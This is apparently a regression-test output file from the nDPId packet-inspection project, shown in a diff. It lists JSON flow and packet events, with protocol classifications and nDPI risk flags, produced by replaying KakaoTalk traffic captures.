00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":347,"total-skipped-flows":0,"total-l4-data-len":52012,"total-not-detected-flows":0,"total-guessed-flows":9,"total-detected-flows":29,"total-detection-updates":32,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":236,"global_ts_msec":1430069073299}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~

166
test/results/KakaoTalk_talk.pcap.out
View File

@@ -1,43 +1,43 @@
00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430069140120}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069140120,"flow_last_seen":1430069140120,"flow_idle_time":7440000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":1,"thread_ts_msec":1430069140120,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069140120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069140120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAHLza0AAPwZJVQoYUrxn9jn7x00fkMsN+RcrPwfugBgApZHwAAABAQgKAAs11Jj3Xso6AAAArVkC\/4gP\/deLY5qAl+gvk5f8xql5QXAwvM9bb5tQyHwtP1GibAaltsw94jGcvj4NNAB8Nc8SXCTCPg=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069140453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069140453,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADRbKkAALgby1Gf2OfsKGFK8H5DHTSs\/B+7LDflVgBAADqYIAAABAQgKmPgkmwALNdQ="}
00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1430069140501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":194,"pkt_l4_len":158,"thread_ts_msec":1430069140501,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAALJbK0AALgbyVWf2OfsKGFK8H5DHTSs\/B+7LDflVgBgADj7dAAABAQgKmPgkrAALNdR6AAAArVkC\/4gP\/deLY5qAl+gvk5f8hql5QTAwvM9Zf4dQyEAJD7QL56t1BA6CZFNB9CDoZPBzNcfqISYY4Bqx6IvbToog47dFxVed4MxS159GEgFcWpzNI6MS\/uDRtBTN\/KgQO5PWR5hOlzi0NPjPSZ5ZvXYRnArc8Dv9Cys="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141261,"flow_last_seen":1430069141261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069141261,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069141261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141261,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY+0AArAbF1ngcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069141403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141403,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjM1kAAPwZ\/FwoYUrx4HBryhuUAUHEB4UFlai7AUBA5CBlHAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1430069141433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141433,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY\/EAArAbF1XgcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141923,"flow_last_seen":1430069141923,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1430069141923,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069141923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":157,"pkt_l4_len":121,"thread_ts_msec":1430069141923,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAI3lSkAAPwYIYQoYUrw2\/7ns5iQUZtvqJ3tQl6xegBgAe+ktAAABAQgKAAs2irXIgpc8aXEgdG89J3hpYW9taS5jb20nIGlkPScwJyBjaGlkPScwJyB0eXBlPSdnZXQnPjxwaW5nIHhtbG5zPSd1cm46eG1wcDpwaW5nJz48L3Bpbmc+PC9pcT4NCg=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069142333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069142333,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTWOEAALQYpzDb\/uewKGFK8FGbmJFCXrF7b6ifUgBAAZ2sMAAABAQgKtcrV6gALNoo="}
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1430069142373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":103,"pkt_l4_len":67,"thread_ts_msec":1430069142373,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFfWOUAALQYpqDb\/uewKGFK8FGbmJFCXrF7b6ifUgBgAZ9bAAAABAQgKtcrV6gALNoo8aXEgY2hpZD0nMCcgaWQ9JzAnIHR5cGU9J3Jlc3VsdCcvPg=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069159456,"flow_last_seen":1430069159456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069159456,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069159456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159456,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvUAAPwaqhQoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOF5AAACBAV4BAIICgALPSMAAAAAAQMDBw=="}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069159814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159814,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvkAAPwaqhAoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOEVAAACBAV4BAIICgALPYcAAAAAAQMDBw=="}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="}
00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
